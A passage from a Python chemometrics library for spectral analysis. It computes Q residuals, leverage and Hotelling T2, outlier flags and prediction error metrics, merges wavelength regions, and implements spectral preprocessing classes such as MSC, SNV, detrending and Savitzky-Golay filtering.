        residual_matrix_list.append(resid)
        fitting_x_list.append(fitted)
        sq = resid ** 2
        row_sq_sum = np.sum(sq, axis=1)
        q[:, lv] = row_sq_sum
        f_residuals[:, lv] = sqrt(np.mean(sq, axis=1))
        x_sample_residuals[:, lv] = row_sq_sum / n_variables
        x_variable_residuals[:, lv] = np.sum(sq, axis=0) / n_samples
    x_total_residuals = np.mean(x_variable_residuals, axis=0, keepdims=True)  # (1, n_lv)
    total_sq = pretreated_data ** 2
    explained_x_sample_variance = (
        1 - x_sample_residuals / (np.sum(total_sq, axis=1, keepdims=True) / n_variables)) * 100
    explained_x_variable_variance = (
        1 - x_variable_residuals.T / (np.sum(total_sq, axis=0) / n_samples)) * 100
    explained_x_total_variance = (1 - x_total_residuals / np.mean(total_sq)) * 100
    explained_x_variance_ratio = np.hstack(
        (explained_x_total_variance[:, 0:1], np.diff(explained_x_total_variance)))
    return {'q': q,
            'f_residuals': f_residuals,
            'residual_matrix_list': residual_matrix_list,
            'fitting_x_list': fitting_x_list,
            'x_sample_residuals': x_sample_residuals,
            'x_variable_residuals': x_variable_residuals,
            'x_total_residuals': x_total_residuals,
            'explained_x_sample_variance': explained_x_sample_variance,
            'explained_x_variable_variance': explained_x_variable_variance.T,
            'explained_x_total_variance': explained_x_total_variance,
            'explained_x_variance_ratio': explained_x_variance_ratio
            }
def q_calc_cv(calx_loadings, scores, pretreated_data):
    '''
    Cross-validation variant of the Q statistic (SPE) computation: Q plus the
    residual and fitted matrices per number of latent variables, without the
    explained-variance bookkeeping.
    For PCA validation pass the pretreated data; for PLS, the pretreated
    absorbance matrix.
    :param calx_loadings: x_loadings of the calibration model
    :param scores: scores of the samples under evaluation
    :param pretreated_data: pretreated data fed into the pca/pls algorithm
    :return: dict with 'q', 'residual_matrix_list', 'fitting_x_list'
    '''
    def _as_2d(arr):
        # promote a 1-D array to a single-column 2-D array
        return arr[:, np.newaxis] if arr.ndim == 1 else arr

    calx_loadings = _as_2d(calx_loadings)
    scores = _as_2d(scores)
    pretreated_data = _as_2d(pretreated_data)
    n_samples, n_lv = scores.shape
    q = zeros((n_samples, n_lv))  # a.k.a. the Squared Prediction Error (SPE)
    residual_matrix_list = []
    fitting_x_list = []
    for lv in range(n_lv):
        fitted = dot(scores[:, :lv + 1], calx_loadings[:, :lv + 1].T)
        resid = pretreated_data - fitted
        residual_matrix_list.append(resid)
        fitting_x_list.append(fitted)
        q[:, lv] = np.sum(resid ** 2, axis=1)
    return {'q': q,
            'residual_matrix_list': residual_matrix_list,
            'fitting_x_list': fitting_x_list}
def leverage_t2_calc(scores, calx_scores):
    '''
    Leverage and Hotelling T2 of samples against a calibration score matrix,
    computed for each number of latent variables.
    :param scores: scores of the samples under evaluation
    :param calx_scores: x_scores of the calibration samples
    :return: dict with 'leverage' and 't2', both shaped (n_samples, n_lv)
    '''
    if scores.ndim == 1:
        scores = scores[:, np.newaxis]  # promote 1-D input to a column
    if calx_scores.ndim == 1:
        calx_scores = calx_scores[:, np.newaxis]  # promote 1-D input to a column
    n_cal = calx_scores.shape[0]
    n_rows, n_lv = scores.shape
    leverage = zeros((n_rows, n_lv))
    for lv in range(n_lv):
        t_sub = scores[:, :lv + 1]
        cal_sub = calx_scores[:, :lv + 1]
        gram_inv = inv(dot(cal_sub.T, cal_sub))
        leverage[:, lv] = diag(dot(dot(t_sub, gram_inv), t_sub.T)) + 1 / n_cal
    t2 = (n_cal - 1) * (leverage - 1 / n_cal)
    return {'leverage': leverage, 't2': t2}
def leverage_t2_calc_cv(cv_x_scores, calx_scores):
    '''
    Leverage and Hotelling T2 for cross-validation, per number of latent
    variables.
    :param cv_x_scores: scores of all samples after validation completes
    :param calx_scores: x_scores of all calibration samples
    :return: dict with 'leverage' and 't2'
    '''
    if cv_x_scores.ndim == 1:
        cv_x_scores = cv_x_scores[:, np.newaxis]  # promote 1-D input to a column
    if calx_scores.ndim == 1:
        calx_scores = calx_scores[:, np.newaxis]  # promote 1-D input to a column
    n_cal = calx_scores.shape[0]
    n_rows, n_lv = cv_x_scores.shape
    leverage = zeros((n_rows, n_lv))
    for lv in range(n_lv):
        t_sub = cv_x_scores[:, :lv + 1]
        cal_sub = calx_scores[:, :lv + 1]
        gram_inv = inv(dot(cal_sub.T, cal_sub))
        leverage[:, lv] = diag(dot(dot(t_sub, gram_inv), t_sub.T)) + 1 / n_cal
    # unlike leverage_t2_calc, the 1/n term is NOT subtracted before scaling here
    t2 = (n_cal - 1) * leverage
    return {'leverage': leverage, 't2': t2}
def outlier_detect(sample_leverage, leverage_limit, y_fprob, sample_indices=None):
    '''
    Flag outliers per latent variable.

    X-direction: leverage above the supplied per-LV limit (conventionally
    3 * mean calibration leverage).
    y-direction: F-distribution probability above 0.99.

    :param sample_leverage: leverage values, (n_samples, n_lv) or 1-D
    :param leverage_limit: per-LV leverage thresholds, (n_lv,)
    :param y_fprob: F probabilities of the y residuals, (n_samples, n_lv) or 1-D
    :param sample_indices: optional index labels; defaults to 0..n_samples-1
    :return: dict of per-LV outlier index lists: raw x/y lists plus x-only,
             y-only and both-xy intersections
    '''
    if sample_leverage.ndim == 1:
        sample_leverage = sample_leverage[:, np.newaxis]
    if y_fprob.ndim == 1:
        y_fprob = y_fprob[:, np.newaxis]
    labels = np.arange(sample_leverage.shape[0]) if sample_indices is None else sample_indices
    n_lv = sample_leverage.shape[1]
    # X direction: leverage above the per-LV threshold
    x_outlier_indices_list = [
        labels[np.where(sample_leverage[:, lv] > leverage_limit[lv])[0]]
        for lv in range(n_lv)]
    # y direction: F probability above 0.99
    y_outlier_indices_list = [
        labels[np.where(abs(y_fprob[:, lv].ravel()) > 0.99)[0]]
        for lv in range(n_lv)]
    just_x_outlier_list = []
    just_y_outlier_list = []
    both_xy_outlier_list = []
    for x_idx, y_idx in zip(x_outlier_indices_list, y_outlier_indices_list):
        both = np.intersect1d(x_idx, y_idx)
        both_xy_outlier_list.append(both)
        just_x_outlier_list.append(np.setdiff1d(x_idx, both))
        just_y_outlier_list.append(np.setdiff1d(y_idx, both))
    return {'x_outlier_indices_list': x_outlier_indices_list,
            'y_outlier_indices_list': y_outlier_indices_list,
            'just_x_outlier_list': just_x_outlier_list,
            'just_y_outlier_list': just_y_outlier_list,
            'both_xy_outlier_list': both_xy_outlier_list
            }
def rmse_calc(predict_value, reference_value):
    '''
    RMSE and related statistics for internal cross-validation or prediction
    (one column of predictions per number of latent variables).
    :param predict_value: predictions, (n_samples, max_nlv) or 1-D
    :param reference_value: reference values, (n_samples, 1) or 1-D
    :return: dict with r2, rmse, sep (bias-corrected rmse), press, rpd, bias,
             linear_regression_coefficient (slope/intercept per LV) and
             relative_error
    '''
    if predict_value.ndim == 1:
        predict_value = predict_value[:, np.newaxis]  # promote 1-D input to a column
    if reference_value.ndim == 1:
        reference_value = reference_value[:, np.newaxis]  # promote 1-D input to a column
    max_nlv = predict_value.shape[1]
    n_samples = reference_value.shape[0]
    error = predict_value - reference_value
    press = np.sum(error * error, axis=0)  # error sum of squares (SSE / PRESS)
    rmse = sqrt(press / n_samples)
    sst = np.sum((reference_value - mean(reference_value)) ** 2)  # total sum of squares (SST)
    ssr = np.sum((predict_value - mean(reference_value)) ** 2, axis=0)  # regression sum of squares (SSR)
    r2 = 1 - press / sst
    sd = sqrt(sst / (n_samples - 1))
    bias = np.mean(error, axis=0)  # mean validation error
    # SEP (Standard Error of Prediction): a bias-corrected RMSE, per OPUS
    SEP = sqrt((np.sum((error - bias) * (error - bias), axis=0)) / (n_samples - 1))
    rpd = sd / SEP
    # least-squares line through (reference, prediction) for each LV,
    # giving slope and intercept per column
    linear_regression_coefficient = zeros((2, max_nlv))
    for lv in range(max_nlv):
        fit_coeff = lsr(reference_value, predict_value[:, lv], order=1)['regression_coefficient']
        linear_regression_coefficient[:, lv] = fit_coeff.ravel()
    relative_error = np.abs(error) / reference_value
    return {'r2': r2, 'rmse': rmse, 'sep': SEP, 'press': press, 'rpd': rpd, 'bias': bias,
            'linear_regression_coefficient': linear_regression_coefficient,
            'relative_error': relative_error}
def verify_customized_regions(intersect_wavelength, customized_regions, threshold=10):
    '''
    Merge overlapping/adjacent user-defined wavelength regions and clip them
    to the valid wavelength range formed by the compatible spectra.

    :param intersect_wavelength: valid wavelength axis; only its first and
                                 last values are used here
    :param customized_regions: nested list like [[4000, 5000], [10000, 7000]]
    :param threshold: max gap (cm-1 / nm) at which two regions are merged
    :return: list of verified [start, end] regions
    :raises ValueError: if no verified region could be produced
    '''
    # +++++++++++++++++++++++ sub_function: merge two regions +++++++++++++++++++++++
    def _check_region(region_a, region_b, threshold=10):
        # renamed the local that previously shadowed the builtin `list`
        pair_sorted = sorted([sorted(region) for region in (region_a, region_b)])
        forward_first, forward_last = pair_sorted[0]
        backward_first, backward_last = pair_sorted[1]
        if (backward_last - forward_last) <= 0:
            # second region fully contained in the first
            return [pair_sorted[0]]
        if (backward_first - forward_last) <= threshold:
            # overlapping, or gap small enough to bridge
            # (covers both the <= 0 and 0 < gap <= threshold cases of the original)
            return [[forward_first, backward_last]]
        # disjoint: keep both; this final `else` also guarantees a return value
        # (the original's exhaustive elif chain could leave `new_list` unbound)
        return pair_sorted
    wavelength_start2end = [intersect_wavelength[0], intersect_wavelength[-1]]
    # +++++++++++++++++++++++ merge regions +++++++++++++++++++++++
    # step1. sort every region, e.g. [10000, 7000] -> [7000, 10000]
    # step2. sort the list, e.g. [[4000, 5000], [7000, 10000], [6000, 8000]] -> [[4000, 5000], [6000, 8000], [7000, 10000]]
    region_list_sort = sorted([sorted(region) for region in customized_regions])
    n_regions = len(region_list_sort)
    merged_list = []
    temp_list = [region_list_sort[0]]
    if n_regions == 1:
        merged_list = region_list_sort
    elif n_regions > 1:
        for i in range(n_regions - 1):
            temp_list = _check_region(temp_list[-1], region_list_sort[i + 1], threshold=threshold)
            if len(temp_list) == 2:
                # the two regions stayed disjoint: the earlier one is final
                merged_list.append(temp_list[0])
        merged_list.append(temp_list[-1])
    # +++++++++++++++++++++++ validate the merged_list +++++++++++++++++++++++
    valid_start, valid_end = sorted(wavelength_start2end)
    verified_regions = []
    for pending_start, pending_end in merged_list:
        if pending_start > valid_end or pending_end < valid_start:
            # region entirely outside the valid range yields the whole valid
            # range — behavior preserved from the original implementation
            temp_valid = [valid_start, valid_end]
        elif pending_start < valid_start and valid_start < pending_end < valid_end:
            temp_valid = [valid_start, pending_end]
        elif valid_start < pending_start < valid_end and pending_end > valid_end:
            temp_valid = [pending_start, valid_end]
        elif pending_start > valid_start and pending_end < valid_end:
            temp_valid = [pending_start, pending_end]
        elif pending_start <= valid_start and pending_end >= valid_end:
            temp_valid = [valid_start, valid_end]
        else:
            temp_valid = [pending_start, pending_end]
        verified_regions.append(temp_valid)
    if len(verified_regions) == 0:
        raise ValueError('选择的谱区与有效谱区不匹配,请重新选择!')
    else:
        return verified_regions
def generate_variable_indices(intersect_wavelength, customized_regions, threshold=10):
    '''
    Map user-defined wavelength regions to variable (column) indices on the
    intersected wavelength axis: first merge overlapping regions and drop the
    parts outside the valid range, then convert each surviving region into a
    contiguous index range.
    :param intersect_wavelength: common wavelength axis of the compatible spectra
    :param customized_regions: nested list like [[4000, 5000], [10000, 7000], [6000, 8000]]
    :param threshold: merge gap tolerance in cm-1 / nm
    :return: 1-D array of variable indices covering all verified regions
    '''
    verified_regions = verify_customized_regions(intersect_wavelength, customized_regions, threshold=threshold)
    indices_list = []
    for region in verified_regions:
        region_start, region_end = region[0], region[1]
        if intersect_wavelength[0] > region_end or intersect_wavelength[-1] < region_start:
            continue  # region lies entirely outside the axis
        start_index = np.argmin(np.abs(intersect_wavelength - region_start))
        end_index = np.argmin(np.abs(intersect_wavelength - region_end))
        # widen by one point where needed so the region boundary is fully enclosed
        if region_start < intersect_wavelength[start_index]:
            start_index -= 1
        if region_end > intersect_wavelength[end_index]:
            end_index += 1
        indices_list.append(np.arange(start_index, end_index + 1))
    variable_indices = np.hstack(indices_list)
    return variable_indices
# +++++++++++++++++++++++++++++++++++++++++++++++ Pretreat Class +++++++++++++++++++++++++++++++++++++++++++++++
# ================ Classes for spectra-matrix operations and for transforms during calibration/prediction ================
# -------- multi-sample operations --------
class MC(object):
    '''
    Mean Centering: subtract the column-wise (per-wavelength) mean absorbance.
    Row 0 of every spectra matrix is the wavelength axis; rows 1.. are spectra.
    '''
    def __init__(self, avg_ab=None):
        # Mean absorbance learned by fit/fit_transform (one value per column).
        self.avg_ab = avg_ab

    def mc(self, spec, avg_ab=None):
        '''Center the absorbance rows of *spec*, using *avg_ab* if supplied.'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        center = np.mean(absorbance, axis=0) if avg_ab is None else avg_ab
        # Broadcasting subtracts the row vector from every spectrum.
        return np.vstack((x_axis, absorbance - center))

    def fit(self, spec):
        '''Learn the wavelength axis and mean absorbance from *spec*.'''
        self.wavelength = spec[0, :]
        self.avg_ab = np.mean(spec[1:, :], axis=0)
        return self

    def fit_transform(self, spec):
        '''Fit on *spec* and return its mean-centered version.'''
        self.fit(spec)
        return self.mc(spec, avg_ab=self.avg_ab)

    def transform(self, input_data):
        '''
        Center new data with the mean learned by fit/fit_transform.
        :param input_data: spectra matrix (row 0 = wavelength axis)
        :return: mean-centered spectra matrix
        '''
        return self.mc(input_data, avg_ab=self.avg_ab)

    def inverse_transform(self, spec_mc, avg_ab=None):
        '''Undo mean centering; uses the stored mean unless *avg_ab* is given.'''
        x_axis = spec_mc[0, :]
        centered = spec_mc[1:, :]
        offset = self.avg_ab if avg_ab is None else avg_ab
        return np.vstack((x_axis, centered + offset))
class ZS(object):
    '''
    Zscore Standardization 中心标准化.
    Column-wise: subtract each column's mean, then divide by its sample
    standard deviation (ddof=1), so every wavelength channel has mean 0 and
    unit variance. Usually applied after mean centering.
    '''
    def __init__(self, avg_ab=None, std_ab=None):
        '''
        :param avg_ab: optional pre-computed column means
        :param std_ab: optional pre-computed column standard deviations
        '''
        self.avg_ab = avg_ab
        self.std_ab = std_ab

    def zs(self, spec, avg_ab=None, std_ab=None):
        '''Standardize the absorbance rows of *spec* (row 0 is the axis).'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        if avg_ab is None and std_ab is None:
            centered = absorbance - np.mean(absorbance, axis=0)
            scaled = centered / np.std(centered, axis=0, ddof=1)
        elif avg_ab is not None and std_ab is not None:
            scaled = (absorbance - avg_ab) / std_ab
        return np.vstack((x_axis, scaled))

    def fit(self, spec):
        '''Learn column means and standard deviations from *spec*.'''
        self.wavelength = spec[0, :]
        absorbance = spec[1:, :]
        self.ab_mean = np.mean(absorbance, axis=0)
        self.ab_std = np.std(absorbance, axis=0, ddof=1)
        return self

    def fit_transform(self, spec):
        '''Fit on *spec* and return its standardized version.'''
        self.fit(spec)
        return self.zs(spec, avg_ab=self.ab_mean, std_ab=self.ab_std)

    def transform(self, input_data):
        '''Standardize new data with the fitted statistics.'''
        return self.zs(input_data, avg_ab=self.ab_mean, std_ab=self.ab_std)

    def inverse_transform(self, spec_as, avg_ab=None, std_ab=None):
        '''Undo standardization; uses the fitted statistics unless supplied.'''
        x_axis = spec_as[0, :]
        scaled = spec_as[1:, :]
        if avg_ab is None and std_ab is None:
            restored = scaled * self.ab_std + self.ab_mean
        else:
            restored = scaled * std_ab + avg_ab
        return np.vstack((x_axis, restored))
class MSC(object):
    '''
    Multiplicative Scatter Correction 多元散射校正.
    Each spectrum is regressed against a reference (ab = c*ref + d) and
    corrected as (ab - d) / c to remove scatter effects.
    '''
    def __init__(self, ideal_ab=None):
        # Reference absorbance used by transform (calibration-set mean).
        self.ideal_ab = ideal_ab

    def msc(self, spec, ideal_ab=None):
        '''
        Correct the absorbance rows of *spec* against *ideal_ab* (or the
        current mean spectrum when *ideal_ab* is None).
        '''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        corrected = np.zeros(absorbance.shape)
        column_mean = np.mean(absorbance, axis=0)
        # Spectra outside the calibration set are corrected against the
        # calibration-set mean spectrum (ideal_ab).
        if ideal_ab is None:
            reference = column_mean
        elif len(ideal_ab) != len(column_mean):
            raise ValueError('数据点数不一致,输入参数有误!')
        else:
            reference = ideal_ab
        for row in range(absorbance.shape[0]):
            # Slope c = coefs[0], offset d = coefs[1].
            coefs = lsr(reference, absorbance[row, :], order=1)['regression_coefficient']
            corrected[row, :] = (absorbance[row, :] - coefs[1]) / coefs[0]
        return np.vstack((x_axis, corrected))

    def fit(self, spec):
        '''Learn the wavelength axis and mean absorbance from *spec*.'''
        self.wavelength = spec[0, :]
        self.ideal_ab = np.mean(spec[1:, :], axis=0)
        return self

    def fit_transform(self, spec):
        '''Fit the reference on *spec* and return its corrected version.'''
        self.fit(spec)
        return self.msc(spec, ideal_ab=self.ideal_ab)

    def transform(self, input_data):
        '''Correct new data against the fitted reference spectrum.'''
        return self.msc(input_data, ideal_ab=self.ideal_ab)
class SGMSC(object):
    '''
    Savitzky-Golay + Multiplicative Scatter Correction 一阶导 + 多元散射校正.
    Applies an SG derivative/smoothing first, then MSC against the mean (or a
    supplied ideal) spectrum of the derived data.
    '''
    def __init__(self, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
        '''
        :param window_size: odd SG window length (points)
        :param polyorder: order of the local polynomial (>= deriv)
        :param deriv: derivative order (0 = smoothing only)
        :param ideal_ab: optional reference absorbance for MSC
        '''
        self.window_size = window_size
        self.polyorder = polyorder
        self.deriv = deriv
        self.ideal_ab = ideal_ab
        return
    def _msc(self, spec, ideal_ab=None):
        '''
        MSC: regress each spectrum on the reference (ab = c*ref + d) and
        correct it as (ab - d) / c.
        '''
        wavelength = spec[0, :]
        ab = spec[1:, :]
        size_of_ab = ab.shape
        ab_msc = np.zeros(size_of_ab)
        # Spectra outside the calibration set must be corrected against the
        # calibration-set mean spectrum (ideal_ab); otherwise use the current mean.
        if ideal_ab is None:
            ab_mean = np.mean(ab, axis=0)
        elif len(ideal_ab) != len(np.mean(ab, axis=0)):
            raise ValueError('数据点数不一致,输入参数有误!')
        else:
            ab_mean = ideal_ab
        d_add = np.ones(size_of_ab[1])  # intercept column (linear offset)
        matrix_A = (np.vstack((ab_mean, d_add))).T
        for i in range(size_of_ab[0]):
            # Least squares: slope c = b[0], offset d = b[1].
            b = dot(dot(np.linalg.inv(dot(matrix_A.T, matrix_A)), matrix_A.T), ab[i, :])
            ab_msc[i, :] = (ab[i, :] - b[1]) / b[0]  # broadcast
        spec_msc = np.vstack((wavelength, ab_msc))
        return spec_msc
    def _sg(self, spec, window_size=11, polyorder=2, deriv=1):
        '''
        Savitzky-Golay filter: fit a local polynomial per window and evaluate
        its value (deriv=0) or derivative (deriv>=1) at the window centre.
        :param spec: row 0 is the wavelength axis, rows 1.. are absorbances
        :param window_size: must be odd and bigger than 2
        :param polyorder: must be bigger than deriv
        :param deriv: derivative order
        :return: filtered matrix, same layout as *spec*
        '''
        try:
            # Builtin int/abs: np.int was removed in NumPy 1.24.
            window_size = abs(int(window_size))
            polyorder = abs(int(polyorder))
        except ValueError:
            raise ValueError("window_size and polyorder have to be of type int")
        if window_size % 2 != 1 or window_size < 2:
            raise ValueError("window_size size must be a positive odd number")
        if window_size < polyorder:  # polyorder must be less than window_size
            raise ValueError("window_size is too small for the polynomials polyorder")
        if deriv > polyorder:  # 'deriv' must be less than or equal to 'polyorder'
            raise ValueError("请调小导数阶数!")
        n = spec.shape[0] - 1  # number of spectra (row 0 is the axis)
        p = spec.shape[1]      # number of wavelength points
        wavelength = spec[0, :]
        half_size = window_size // 2
        # Design matrix of the local polynomial fit: coef[i, j] = (i - half)^j.
        coef = np.zeros((window_size, polyorder + 1))
        for i in range(coef.shape[0]):
            for j in range(coef.shape[1]):
                coef[i, j] = np.power(i - int(window_size / 2), j)
        c = dot(inv(dot(coef.T, coef)), coef.T)
        # Row `deriv` of c is the fitted coefficient of x^deriv; multiply by
        # deriv! to obtain the derivative value at the window centre.
        coefs = np.zeros(window_size)
        for k in range(window_size):
            if deriv == 0 or deriv == 1:
                coefs[k] = c[deriv, k]
            elif deriv == 2:
                coefs[k] = c[deriv, k] * 2
            elif deriv == 3:
                coefs[k] = c[deriv, k] * 6
            elif deriv == 4:
                coefs[k] = c[deriv, k] * 24
        # Filter the absorbance block (valid windows only).
        tempdata = np.zeros((n, p))
        ab = spec[1:, :]
        for j in range(0, p - window_size + 1):
            data_window = ab[:, j:j + window_size]
            new_y = dot(data_window, coefs[:, np.newaxis])  # coefs as a column vector
            tempdata[:, j + half_size] = new_y.ravel()
        # Pad both ends with the nearest computed value.
        for j in range(0, half_size):
            tempdata[:, j] = tempdata[:, half_size]
        for j in range(p - half_size, p):
            tempdata[:, j] = tempdata[:, p - half_size - 1]
        # Convert index-space derivative to wavelength-space (assumes a
        # uniform wavelength step -- TODO confirm for non-uniform axes).
        if deriv > 0:
            x_step = wavelength[1] - wavelength[0]
            x_step = np.power(x_step, deriv)
            ab_sg = tempdata / x_step
        else:
            ab_sg = tempdata
        spec_sg_matrix = np.vstack((wavelength, ab_sg))
        return spec_sg_matrix
    def sgmsc(self, spec, window_size=11, polyorder=2, deriv=1, ideal_ab=None):
        '''SG derivative first, then MSC.'''
        spec_sg = self._sg(spec, window_size=window_size, polyorder=polyorder, deriv=deriv)
        spec_sg_msc = self._msc(spec_sg, ideal_ab=ideal_ab)
        return spec_sg_msc
    def fit(self, spec):
        '''Store the wavelength axis and mean absorbance (expects SG-derived data).'''
        self.wavelength = spec[0, :]
        self.ideal_ab = np.mean(spec[1:, :], axis=0)
        return self
    def fit_transform(self, spec):
        '''Derive *spec*, fit the MSC reference on the derived data, correct.'''
        spec_sg = self._sg(spec, window_size=self.window_size, polyorder=self.polyorder, deriv=self.deriv)
        self.fit(spec_sg)
        spec_sg_msc = self._msc(spec_sg, ideal_ab=self.ideal_ab)
        return spec_sg_msc
    def transform(self, input_data):
        '''Apply SG + MSC to new data using the fitted reference.'''
        spec_sg = self._sg(input_data, window_size=self.window_size, polyorder=self.polyorder,
                           deriv=self.deriv)
        spec_sg_msc = self._msc(spec_sg, ideal_ab=self.ideal_ab)
        return spec_sg_msc
# -------- 单样本操作 --------
class VN(object):
    '''
    Vector Normalization 矢量归一化: scale every spectrum (row) to unit
    Euclidean length so all spectra share the same magnitude.
    '''
    def __init__(self):
        pass

    def vn(self, spec):
        '''Normalize each absorbance row of *spec* to unit norm.'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        norms = np.linalg.norm(absorbance, axis=1, keepdims=True)
        return np.vstack((x_axis, absorbance / norms))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and normalize *spec*.'''
        self.wavelength = spec[0, :]
        return self.vn(spec)

    def transform(self, input_data):
        '''Normalize new data; the wavelength axis must match the fitted one.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.vn(input_data)
class SNV(object):
    '''
    Standard Normal Variate transformation 标准正态变换: center every
    spectrum (row) by its own mean and scale by its own sample standard
    deviation (ddof=1).
    '''
    def __init__(self):
        pass

    def snv(self, spec):
        '''Apply SNV to the absorbance rows of *spec* (row 0 is the axis).'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        row_mean = np.mean(absorbance, axis=1, keepdims=True)
        row_std = np.std(absorbance, axis=1, keepdims=True, ddof=1)
        return np.vstack((x_axis, (absorbance - row_mean) / row_std))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and apply SNV to *spec*.'''
        self.wavelength = spec[0, :]
        return self.snv(spec)

    def transform(self, input_data):
        '''Apply SNV to new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.snv(input_data)
class ECO(object):
    '''
    Eliminate Constant Offset 消除常数偏移量: shift every spectrum (row) so
    that its own minimum value becomes zero.
    '''
    def __init__(self):
        pass

    def eco(self, spec):
        '''Subtract each row's minimum from the absorbance rows of *spec*.'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        shifted = absorbance - np.min(absorbance, axis=1, keepdims=True)
        return np.vstack((x_axis, shifted))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and remove the constant offsets.'''
        self.wavelength = spec[0, :]
        return self.eco(spec)

    def transform(self, input_data):
        '''Remove offsets from new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.eco(input_data)
class SSL(object):
    '''
    Subtract Straight Line 减去一条直线: remove, per spectrum, the
    least-squares straight line fitted against the wavelength axis
    (linear de-trending).
    '''
    def __init__(self):
        pass

    def ssl(self, spec):
        '''De-trend each absorbance row of *spec* (row 0 must be the axis).'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        detrended = np.zeros(absorbance.shape)
        for row in range(absorbance.shape[0]):
            # Fitted trend line for this spectrum.
            trend = lsr(x_axis, absorbance[row, :], order=1)['fit_value']
            detrended[row, :] = absorbance[row, :] - trend.ravel()
        return np.vstack((x_axis, detrended))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and de-trend *spec*.'''
        self.wavelength = spec[0, :]
        return self.ssl(spec)

    def transform(self, input_data):
        '''De-trend new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.ssl(input_data)
class DT(object):
    '''
    De-Trending 去趋势: remove, per spectrum, the least-squares quadratic
    (order-2 polynomial) fitted against the wavelength axis.
    '''
    def __init__(self):
        pass

    def dt(self, spec):
        '''De-trend each absorbance row of *spec* (row 0 must be the axis).'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        detrended = np.zeros(absorbance.shape)
        for row in range(absorbance.shape[0]):
            # Fitted quadratic trend for this spectrum.
            trend = lsr(x_axis, absorbance[row, :], order=2)['fit_value']
            detrended[row, :] = absorbance[row, :] - trend.ravel()
        return np.vstack((x_axis, detrended))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and de-trend *spec*.'''
        self.wavelength = spec[0, :]
        return self.dt(spec)

    def transform(self, input_data):
        '''De-trend new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.dt(input_data)
class MMN(object):  # just used for spectra preprocessing
    '''
    Min-Max Normalization 最小最大归一化: linearly rescale every spectrum
    (row) into the interval [norm_min, norm_max].
    '''
    def __init__(self, norm_min=0, norm_max=1):
        self.norm_min = norm_min
        self.norm_max = norm_max

    def mmn(self, spec, norm_min=0, norm_max=1):
        '''Rescale the absorbance rows of *spec* into [norm_min, norm_max].'''
        x_axis = spec[0, :]
        absorbance = spec[1:, :]
        low = np.min(absorbance, axis=1, keepdims=True)
        high = np.max(absorbance, axis=1, keepdims=True)
        rescaled = norm_min + (absorbance - low) * (norm_max - norm_min) / (high - low)
        return np.vstack((x_axis, rescaled))

    def fit_transform(self, spec):
        '''Remember the wavelength axis and rescale *spec*.'''
        self.wavelength = spec[0, :]
        return self.mmn(spec, norm_min=self.norm_min, norm_max=self.norm_max)

    def transform(self, input_data):
        '''Rescale new data; the wavelength axis must match.'''
        if not (input_data[0, :] == self.wavelength).all():
            raise ValueError('光谱数据不兼容!')
        return self.mmn(input_data, norm_min=self.norm_min, norm_max=self.norm_max)
class SG(object):
    '''
    Savitzky-Golay 平滑与求导: fit a local polynomial in a sliding window and
    evaluate its value (deriv=0) or one of its derivatives at the centre.
    '''
    def __init__(self, window_size=11, polyorder=2, deriv=1):
        '''
        OPUS中polyorder默认为2 (OPUS defaults polyorder to 2).
        :param window_size: odd window length (points)
        :param polyorder: order of the local polynomial (>= deriv)
        :param deriv: derivative order (0 = smoothing only)
        '''
        self.window_size = window_size
        self.polyorder = polyorder
        self.deriv = deriv
        return
    def sg(self, spec, window_size=11, polyorder=2, deriv=1):
        '''
        Apply the SG filter to a spectra matrix.
        :param spec: row 0 is the wavelength axis, rows 1.. are absorbances
        :param window_size: must be odd and bigger than 2
        :param polyorder: must be bigger than deriv
        :param deriv: derivative order
        :return: filtered matrix, same layout as *spec*
        '''
        try:
            # Builtin int/abs: np.int was removed in NumPy 1.24.
            window_size = abs(int(window_size))
            polyorder = abs(int(polyorder))
        except ValueError:
            raise ValueError("window_size and polyorder have to be of type int")
        if window_size % 2 != 1 or window_size < 2:
            raise ValueError("window_size size must be a positive odd number")
        if window_size < polyorder:  # polyorder must be less than window_size
            raise ValueError("window_size is too small for the polynomials polyorder")
        if deriv > polyorder:  # 'deriv' must be less than or equal to 'polyorder'
            raise ValueError("请调小导数阶数!")
        n = spec.shape[0] - 1  # number of spectra (row 0 is the axis)
        p = spec.shape[1]      # number of wavelength points
        wavelength = spec[0, :]
        half_size = window_size // 2
        # Design matrix of the local polynomial fit: coef[i, j] = (i - half)^j.
        coef = np.zeros((window_size, polyorder + 1))
        for i in range(coef.shape[0]):
            for j in range(coef.shape[1]):
                coef[i, j] = np.power(i - int(window_size / 2), j)
        c = dot(inv(dot(coef.T, coef)), coef.T)
        # Row `deriv` of c is the fitted coefficient of x^deriv; multiply by
        # deriv! to obtain the derivative value at the window centre.
        coefs = np.zeros(window_size)  # (window_size,)
        for k in range(window_size):
            if deriv == 0 or deriv == 1:
                coefs[k] = c[deriv, k]
            elif deriv == 2:
                coefs[k] = c[deriv, k] * 2
            elif deriv == 3:
                coefs[k] = c[deriv, k] * 6
            elif deriv == 4:
                coefs[k] = c[deriv, k] * 24
        # Filter the absorbance block (valid windows only).
        tempdata = np.zeros((n, p))
        ab = spec[1:, :]
        for j in range(0, p - window_size + 1):
            data_window = ab[:, j:j + window_size]
            new_y = dot(data_window, coefs[:, np.newaxis])  # coefs as a column vector
            tempdata[:, j + half_size] = new_y.ravel()
        # Pad both ends with the nearest computed value.
        for j in range(0, half_size):
